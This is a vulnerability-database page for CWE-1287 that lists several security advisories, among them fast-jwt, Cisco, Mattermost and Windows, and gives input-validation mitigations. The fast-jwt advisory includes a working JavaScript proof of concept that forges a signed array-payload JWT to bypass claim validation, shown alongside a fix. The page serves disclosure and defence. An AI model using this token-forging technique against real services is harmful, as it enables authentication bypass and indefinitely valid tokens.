Common Weakness Enumeration

CWE-1287

Allowed

Improper Validation of Specified Type of Input

Abstraction: Base · Status: Incomplete

The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.

291 vulnerabilities reference this CWE, most recent first.

GHSA-5HJW-83FP-PHQ9

Vulnerability from github – Published: 2026-10-08 22:01 – Updated: 2026-10-08 22:01
VLAI
Summary
fast-jwt : Silent claim-validator bypass when JWT payload is a JSON array
Details

Summary

fast-jwt's createVerifier silently skips all configured claim validators (exp, nbf, iss, aud, sub, jti, nonce) when a validly-signed JWT carries a JSON array as its payload instead of an object. The verifier reports success while having enforced only the signature. This breaks the library's documented allowedIss / allowedAud / allowedSub / expiry / replay-protection guarantees and violates RFC 7519 §7.2 step 10, which requires the JWT Claims Set to be a JSON object.

Details

The decoder validates the header is a non-array object but the payload check is missing the Array.isArray guard:

```javascript // src/decoder.js:49 — header check (correct) if (!header || typeof header !== 'object' || Array.isArray(header)) { throw new TokenError(TokenError.codes.malformed, 'The token header is not a valid JSON object.') }

// src/decoder.js:65 — payload check (vulnerable) if (!payload || typeof payload !== 'object') { // typeof [] === 'object' throw new TokenError(TokenError.codes.invalidPayload, 'The payload must be an object', { payload }) }

Because typeof [] === 'object' in JavaScript, an array payload passes the decoder.

In the verifier's validator loop, every check is short-circuited by an in-test that is always false for an array (arrays have only numeric indices and length):

// src/verifier.js:304-323 for (const { type, claim, allowed, array, modifier, greater, errorCode, errorVerb } of validators) { const value = payload[claim] ... if (!(claim in payload)) { // 'exp' in [] === false, 'iss' in [] === false, etc. continue // every validator silently skipped } ... }

Result: exp, nbf, iss (allowedIss), aud (allowedAud), sub (allowedSub), jti, and nonce checks are all skipped without any error returned to the caller. The verifier returns the array as the payload.

requiredClaims, which uses the same in-test but throws instead of continue (verifier.js:295), does block the bypass — but it is opt-in and not commonly configured.

GHSA-gm45-q3v2-6cf8 (CVE-2025-30144) previously patched the case where an individual claim value is an array. That fix operates inside the validator loop body and is never reached for this variant.


### PoC

  ```javascript
const { createVerifier } = require('fast-jwt')
  const crypto = require('crypto')

  const key = 'shared-secret'
  const header = Buffer.from(JSON.stringify({ alg: 'HS256', typ: 'JWT' })).toString('base64url')
  const payload = Buffer.from(JSON.stringify(['attacker', 'role:admin'])).toString('base64url')
  const sig = crypto.createHmac('sha256', key).update(`${header}.${payload}`).digest('base64url')
  const token = `${header}.${payload}.${sig}`

  const verify = createVerifier({
    key,
    allowedIss: ['legit-issuer'],
    allowedAud: ['legit-audience'],
    allowedSub: ['legit-subject']
    // exp enforcement is on by default
  })

  console.log(verify(token))
  // Output: [ 'attacker', 'role:admin' ]
  // No error thrown. allowedIss/allowedAud/allowedSub/exp all skipped.

  // Control: an object payload with the same garbage claims is correctly rejected:
  const bad = Buffer.from(JSON.stringify({ iss: 'attacker', exp: 1 })).toString('base64url')
  const sig2 = crypto.createHmac('sha256', key).update(`${header}.${bad}`).digest('base64url')
  verify(`${header}.${bad}.${sig2}`)
  // Throws: "The token has expired at 1970-01-01T00:00:01.000Z."

  Verified against fast-jwt v6.2.4 (current master, commit a510448).

Suggested patch (src/decoder.js:65):

  • if (!payload || typeof payload !== 'object') {
  • if (!payload || typeof payload !== 'object' || Array.isArray(payload)) { throw new TokenError(TokenError.codes.invalidPayload, 'The payload must be an object', { payload }) }

This mirrors the existing header guard at line 49.

Impact

Type: Silent authorization-validator bypass. When a validly-signed JWT carries a JSON array as its payload, createVerifier skips every configured claim validator (exp, nbf, iss/allowedIss, aud/allowedAud, sub/allowedSub, jti, nonce) and returns success. Only the signature is actually checked; the verifier gives no error or warning that the configured defenses did not run.

Who is impacted: Any application using fast-jwt's createVerifier with claim-validation options and where an attacker can produce or influence a validly-signed token. The realistic deployments are:

  • Shared-HMAC microservice meshes — any party holding the secret can mint a token accepted by every other verifier with audience, issuer, and expiry enforcement disabled.
  • Multi-tenant token issuers and SSO backends — a tenant or upstream caller able to influence payload shape can obtain forever-tokens accepted platform-wide.
  • Delegated signing / weak issuer-side input validation — any issuer that serializes attacker-controlled JSON into the payload without enforcing object shape.

Consequences: forever-tokens (expiry bypass), cross-service replay (audience bypass), issuer spoofing in federated/OIDC setups, revocation-list bypass via missing jti, OIDC nonce replay, and audit-trail corruption (payload.sub is undefined so authenticated requests appear unattributable in logs).

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.2.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "fast-jwt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-107723"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-08T22:01:58Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n `fast-jwt`\u0027s `createVerifier` silently skips **all** configured claim validators (`exp`, `nbf`, `iss`, `aud`, `sub`, `jti`, `nonce`) when a validly-signed JWT carries a JSON array as its payload instead of an object. The verifier reports success while having enforced only the signature. This breaks the library\u0027s documented `allowedIss` / `allowedAud` / `allowedSub` / expiry / replay-protection guarantees and violates RFC 7519 \u00a77.2 step 10, which requires the JWT Claims Set to be a JSON object.\n\n### Details\nThe decoder validates the **header** is a non-array object but the **payload** check is missing the `Array.isArray` guard:\n\n  ```javascript\n  // src/decoder.js:49 \u2014 header check (correct)\n  if (!header || typeof header !== \u0027object\u0027 || Array.isArray(header)) {\n    throw new TokenError(TokenError.codes.malformed, \u0027The token header is not a valid JSON object.\u0027)\n  }\n\n  // src/decoder.js:65 \u2014 payload check (vulnerable)\n  if (!payload || typeof payload !== \u0027object\u0027) {     // typeof [] === \u0027object\u0027\n    throw new TokenError(TokenError.codes.invalidPayload, \u0027The payload must be an object\u0027, { payload })\n  }\n\n  Because typeof [] === \u0027object\u0027 in JavaScript, an array payload passes the decoder.\n\n  In the verifier\u0027s validator loop, every check is short-circuited by an in-test that is always false for an array (arrays have only\n  numeric indices and length):\n\n  // src/verifier.js:304-323\n  for (const { type, claim, allowed, array, modifier, greater, errorCode, errorVerb } of validators) {\n    const value = payload[claim]\n    ...\n    if (!(claim in payload)) {     // \u0027exp\u0027 in [] === false, \u0027iss\u0027 in [] === false, etc.\n      continue                      // every validator silently skipped\n    }\n    ...\n  }\n\n  Result: exp, nbf, iss (allowedIss), aud (allowedAud), sub (allowedSub), jti, and nonce checks are all skipped without any error\n  returned to the caller. The verifier returns the array as the payload.\n\n  requiredClaims, which uses the same in-test but throws instead of continue (verifier.js:295), does block the bypass \u2014 but it is\n  opt-in and not commonly configured.\n\n  GHSA-gm45-q3v2-6cf8 (CVE-2025-30144) previously patched the case where an individual claim value is an array. That fix operates\n  inside the validator loop body and is never reached for this variant.\n```\n\n### PoC\n\n  ```javascript\nconst { createVerifier } = require(\u0027fast-jwt\u0027)\n  const crypto = require(\u0027crypto\u0027)\n\n  const key = \u0027shared-secret\u0027\n  const header = Buffer.from(JSON.stringify({ alg: \u0027HS256\u0027, typ: \u0027JWT\u0027 })).toString(\u0027base64url\u0027)\n  const payload = Buffer.from(JSON.stringify([\u0027attacker\u0027, \u0027role:admin\u0027])).toString(\u0027base64url\u0027)\n  const sig = crypto.createHmac(\u0027sha256\u0027, key).update(`${header}.${payload}`).digest(\u0027base64url\u0027)\n  const token = `${header}.${payload}.${sig}`\n\n  const verify = createVerifier({\n    key,\n    allowedIss: [\u0027legit-issuer\u0027],\n    allowedAud: [\u0027legit-audience\u0027],\n    allowedSub: [\u0027legit-subject\u0027]\n    // exp enforcement is on by default\n  })\n\n  console.log(verify(token))\n  // Output: [ \u0027attacker\u0027, \u0027role:admin\u0027 ]\n  // No error thrown. allowedIss/allowedAud/allowedSub/exp all skipped.\n\n  // Control: an object payload with the same garbage claims is correctly rejected:\n  const bad = Buffer.from(JSON.stringify({ iss: \u0027attacker\u0027, exp: 1 })).toString(\u0027base64url\u0027)\n  const sig2 = crypto.createHmac(\u0027sha256\u0027, key).update(`${header}.${bad}`).digest(\u0027base64url\u0027)\n  verify(`${header}.${bad}.${sig2}`)\n  // Throws: \"The token has expired at 1970-01-01T00:00:01.000Z.\"\n\n  Verified against fast-jwt v6.2.4 (current master, commit a510448).\n\n```\n\n  Suggested patch (src/decoder.js:65):\n\n  - if (!payload || typeof payload !== \u0027object\u0027) {\n  + if (!payload || typeof payload !== \u0027object\u0027 || Array.isArray(payload)) {\n      throw new TokenError(TokenError.codes.invalidPayload, \u0027The payload must be an object\u0027, { payload })\n    }\n\n  This mirrors the existing header guard at line 49.\n\n### Impact\nType: Silent authorization-validator bypass. When a validly-signed JWT carries a JSON array as its payload, createVerifier skips every configured claim validator (exp, nbf, iss/allowedIss, aud/allowedAud, sub/allowedSub, jti, nonce) and returns success. Only the signature is actually checked; the verifier gives no error or warning that the configured defenses did not run.\n\nWho is impacted: Any application using fast-jwt\u0027s createVerifier with claim-validation options and where an attacker can produce or\n   influence a validly-signed token. The realistic deployments are:\n\n  - Shared-HMAC microservice meshes \u2014 any party holding the secret can mint a token accepted by every other verifier with audience, issuer, and expiry enforcement disabled.\n  - Multi-tenant token issuers and SSO backends \u2014 a tenant or upstream caller able to influence payload shape can obtain\n  forever-tokens accepted platform-wide.\n  - Delegated signing / weak issuer-side input validation \u2014 any issuer that serializes attacker-controlled JSON into the payload\n  without enforcing object shape.\n\n  Consequences: forever-tokens (expiry bypass), cross-service replay (audience bypass), issuer spoofing in federated/OIDC setups,\n  revocation-list bypass via missing jti, OIDC nonce replay, and audit-trail corruption (payload.sub is undefined so authenticated\n  requests appear unattributable in logs).",
  "id": "GHSA-5hjw-83fp-phq9",
  "modified": "2026-10-08T22:01:58Z",
  "published": "2026-10-08T22:01:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nearform/fast-jwt/security/advisories/GHSA-5hjw-83fp-phq9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nearform/fast-jwt/pull/639"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nearform/fast-jwt/commit/86e83efd8b5244f50859532d99244f0a9a9a4368"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nearform/fast-jwt"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nearform/fast-jwt/releases/tag/v6.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-jwt : Silent claim-validator bypass when JWT payload is a JSON array"
}

GHSA-5JCX-7JCF-9FW2

Vulnerability from github – Published: 2025-05-07 18:30 – Updated: 2025-05-07 18:30
VLAI
Details

A vulnerability in the bootstrap loading of Cisco IOS XE Software could allow an authenticated, local attacker to write arbitrary files to an affected system.

This vulnerability is due to insufficient input validation of the bootstrap file that is read by the system software when a device is first deployed in SD-WAN mode or when an administrator configures SD-Routing on the device. An attacker could exploit this vulnerability by modifying a bootstrap file generated by Cisco Catalyst SD-WAN Manager, loading it into the device flash, and then either reloading the device in a green field deployment in SD-WAN mode or configuring the device with SD-Routing. A successful exploit could allow the attacker to perform arbitrary file writes to the underlying operating system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-20155"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-07T18:15:37Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the bootstrap loading of Cisco IOS XE Software could allow an authenticated, local attacker to write arbitrary files to an affected system.\n\n This vulnerability is due to insufficient input validation of the bootstrap file that is read by the system software when a device is first deployed in SD-WAN mode or when an administrator configures SD-Routing on the device. An attacker could exploit this vulnerability by modifying a bootstrap file generated by Cisco Catalyst SD-WAN Manager, loading it into the device flash, and then either reloading the device in a green field deployment in SD-WAN mode or configuring the device with SD-Routing. A successful exploit could allow the attacker to perform arbitrary file writes to the underlying operating system.",
  "id": "GHSA-5jcx-7jcf-9fw2",
  "modified": "2025-05-07T18:30:48Z",
  "published": "2025-05-07T18:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20155"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bootstrap-KfgxYgdh"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5M7J-6GC4-FF5G

Vulnerability from github – Published: 2025-01-15 18:30 – Updated: 2025-01-17 15:15
VLAI
Summary
Mattermost fails to properly validate post props
Details

Mattermost versions 10.2.x <= 10.2.0, 9.11.x <= 9.11.5, 10.0.x <= 10.0.3, 10.1.x <= 10.1.3 fail to properly validate post props which allows a malicious authenticated user to cause a crash via a malicious post.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.2.0"
            },
            {
              "fixed": "10.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.1.3"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.1.0"
            },
            {
              "fixed": "10.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.0.3"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 9.11.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.11.0"
            },
            {
              "fixed": "9.11.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.0.0-20241127161322-25ff7a3779a5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-20086"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-15T20:06:58Z",
    "nvd_published_at": "2025-01-15T17:15:19Z",
    "severity": "MODERATE"
  },
  "details": "Mattermost versions 10.2.x \u003c= 10.2.0, 9.11.x \u003c= 9.11.5, 10.0.x \u003c= 10.0.3, 10.1.x \u003c= 10.1.3 fail to properly validate post props which allows a malicious authenticated user to cause a crash via a malicious post.",
  "id": "GHSA-5m7j-6gc4-ff5g",
  "modified": "2025-01-17T15:15:45Z",
  "published": "2025-01-15T18:30:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20086"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mattermost/mattermost"
    },
    {
      "type": "WEB",
      "url": "https://mattermost.com/security-updates"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3392"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mattermost fails to properly validate post props"
}

GHSA-5P3R-7JHW-3CM2

Vulnerability from github – Published: 2025-03-24 15:30 – Updated: 2025-03-24 15:30
VLAI
Details

Mattermost Mobile Apps versions <=2.25.0 fail to properly validate GIF images prior to rendering which allows a malicious user to cause the Android application to crash via message containing a maliciously crafted GIF.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1558"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-24T15:15:16Z",
    "severity": "MODERATE"
  },
  "details": "Mattermost Mobile Apps versions \u003c=2.25.0 fail to properly validate GIF images prior to rendering which allows a malicious user to cause the Android application to crash via message containing a maliciously crafted GIF.",
  "id": "GHSA-5p3r-7jhw-3cm2",
  "modified": "2025-03-24T15:30:49Z",
  "published": "2025-03-24T15:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1558"
    },
    {
      "type": "WEB",
      "url": "https://mattermost.com/security-updates"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5WF5-MWM8-68X4

Vulnerability from github – Published: 2026-01-23 00:31 – Updated: 2026-01-23 00:31
VLAI
Details

Improper validation of specified type of input in M365 Copilot allows an unauthorized attacker to disclose information over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-24307"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T23:15:59Z",
    "severity": "CRITICAL"
  },
  "details": "Improper validation of specified type of input in M365 Copilot allows an unauthorized attacker to disclose information over a network.",
  "id": "GHSA-5wf5-mwm8-68x4",
  "modified": "2026-01-23T00:31:18Z",
  "published": "2026-01-23T00:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24307"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24307"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6238-89RC-FWRC

Vulnerability from github – Published: 2025-12-10 15:31 – Updated: 2025-12-10 15:31
VLAI
Details

An unauthorised attacker within bluetooth range may use an improper validation during the BLE connection request to deadlock the affected devices.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-2105"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-10T13:16:02Z",
    "severity": "MODERATE"
  },
  "details": "An unauthorised attacker within bluetooth range may use an improper validation during the BLE connection request to deadlock the affected devices.",
  "id": "GHSA-6238-89rc-fwrc",
  "modified": "2025-12-10T15:31:24Z",
  "published": "2025-12-10T15:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2105"
    },
    {
      "type": "WEB",
      "url": "https://certvde.com/en/advisories/VDE-2025-089"
    },
    {
      "type": "WEB",
      "url": "https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0002.json"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-625M-28MG-RQ98

Vulnerability from github – Published: 2023-12-15 18:30 – Updated: 2023-12-15 18:30
VLAI
Details

An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-3904"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287",
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-15T16:15:43Z",
    "severity": "MODERATE"
  },
  "details": "An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards.",
  "id": "GHSA-625m-28mg-rq98",
  "modified": "2023-12-15T18:30:28Z",
  "published": "2023-12-15T18:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3904"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/2053154"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/418226"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-62CP-QVQ6-CFW4

Vulnerability from github – Published: 2025-08-14 18:31 – Updated: 2025-08-14 18:31
VLAI
Details

A vulnerability in the Remote Access SSL VPN service for Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an authenticated, remote attacker to create or delete arbitrary files on the underlying operating system. If critical system files are manipulated, new Remote Access SSL VPN sessions could be denied and existing sessions could be dropped, causing a denial of service (DoS) condition. An exploited device requires a manual reboot to recover.

This vulnerability is due to insufficient input validation when processing HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to create or delete files on the underlying operating system, which could cause the Remote Access SSL VPN service to become unresponsive. To exploit this vulnerability, the attacker must be authenticated as a VPN user of the affected device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-20251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-14T17:15:38Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the Remote Access SSL VPN service for Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an authenticated, remote attacker to create or delete arbitrary files on the underlying operating system. If critical system files are manipulated, new Remote Access SSL VPN sessions could be denied and existing sessions could be dropped, causing a denial of service (DoS) condition. An exploited device requires a manual reboot to recover.\n\nThis vulnerability is due to insufficient input validation when processing HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to create or delete files on the underlying operating system, which could cause the Remote Access SSL VPN service to become unresponsive.\nTo exploit this vulnerability, the attacker must be authenticated as a VPN user of the affected device.",
  "id": "GHSA-62cp-qvq6-cfw4",
  "modified": "2025-08-14T18:31:29Z",
  "published": "2025-08-14T18:31:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20251"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-http-file-hUyX2jL4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-69PR-78GV-7C6H

Vulnerability from github – Published: 2024-12-16 09:31 – Updated: 2024-12-16 19:29
VLAI
Summary
Mattermost Improper Validation of Specified Type of Input vulnerability
Details

Mattermost versions 10.1.x <= 10.1.2, 10.0.x <= 10.0.2, 9.11.x <= 9.11.4, 9.5.x <= 9.5.12 fail to properly validate the type of callProps which allows a user to cause a client side (webapp and mobile) DoS to users of particular channels, by sending a specially crafted post.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.1.0"
            },
            {
              "fixed": "10.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.11.0"
            },
            {
              "fixed": "9.11.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.5.0"
            },
            {
              "fixed": "9.5.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-54083"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-12-16T19:23:55Z",
    "nvd_published_at": "2024-12-16T08:15:05Z",
    "severity": "MODERATE"
  },
  "details": "Mattermost versions 10.1.x \u003c= 10.1.2, 10.0.x \u003c= 10.0.2, 9.11.x \u003c= 9.11.4, 9.5.x \u003c= 9.5.12 fail to properly validate the type of\u00a0callProps\u00a0which allows a user to cause a client side (webapp and mobile) DoS to users of particular channels, by sending a specially crafted post.",
  "id": "GHSA-69pr-78gv-7c6h",
  "modified": "2024-12-16T19:29:16Z",
  "published": "2024-12-16T09:31:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54083"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mattermost/mattermost"
    },
    {
      "type": "WEB",
      "url": "https://mattermost.com/security-updates"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mattermost Improper Validation of Specified Type of Input vulnerability"
}

GHSA-69W6-8JQV-GJ6V

Vulnerability from github – Published: 2025-10-14 18:30 – Updated: 2025-10-14 18:30
VLAI
Details

Improper validation of specified type of input in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-59278"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-14T17:16:10Z",
    "severity": "HIGH"
  },
  "details": "Improper validation of specified type of input in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.",
  "id": "GHSA-69w6-8jqv-gj6v",
  "modified": "2025-10-14T18:30:36Z",
  "published": "2025-10-14T18:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59278"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59278"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

No CAPEC attack patterns related to this CWE.